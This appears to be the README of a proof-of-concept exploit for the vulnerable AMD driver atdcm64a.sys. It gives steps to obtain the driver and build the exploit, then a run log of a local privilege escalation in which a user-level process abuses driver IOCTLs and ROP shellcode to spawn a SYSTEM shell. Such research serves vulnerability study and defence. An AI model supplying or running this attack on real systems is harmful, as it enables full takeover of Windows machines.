Exploit for atdcm64a.sys vulnerable driver. The vulnerable driver can be downloaded from this link. If not possible follow this procedure:
- Navigate to this link
- Expand the “Windows 10 – 64-bit Edition” tab
- Download the package Adrenalin Edition 18.12.1.1 Optional (Release date: 2018-12-05)
All info are in the blog series here.
Compile with Visual Studio using Release
x64
. Exploit will be located at .\x64\Release\DrvExpTemplate.exe
. Ignore error of type Exit from command copy <path> x:\temp\
. This command was executed in order to deploy automatically the compiled exploit on the target machine, therefore you can ignore the error.
PS > whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:\Users\IEUser\Desktop> .\DrvExpTemplate.exe
[+] Opened handle to device: 0x00000000000000D0
[+] User buffer allocated: 0x0000025BEC060000
[*] sent IOCTL_READMSR
[+] readMSR success.
[+] IA32_LSTAR = 0xFFFFF800264F61C0
[+] g_ntbase = 0xFFFFF80025A00000
[+] object = 0x0000001AFEFF0000
[+] second object = 0x0000001AFEFFFFD0
[+] ptr = 0x0000001AFF000000
[+] object2 = 0x0000025BEC080000
[+] driverObject = 0x0000025BEC090000
[+] ptr->AttachedDevice = 0x0000025BEC080030
[*] fake_stack = 0x00000000FEFF0000
[+] VirtualLock returned successfully
[*] ropStack = 0x00000000FF000000
[*] sc = 0x00001A1A1A003500
[*] pml4shellcode_index 0x0000000000000034
[+] User buffer allocated: 0x0000025BEC070000
[*] sent IOCTL_ARBITRARYCALLDRIVER
[+] arbitraryCallDriver returned successfully.
[*] spawning system shell...
Microsoft Windows [Version 10.0.22631.2861]
(c) Microsoft Corporation. All rights reserved.
>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeCreateTokenPrivilege Create a token object Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Enabled
SeRelabelPrivilege Modify an object label Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
>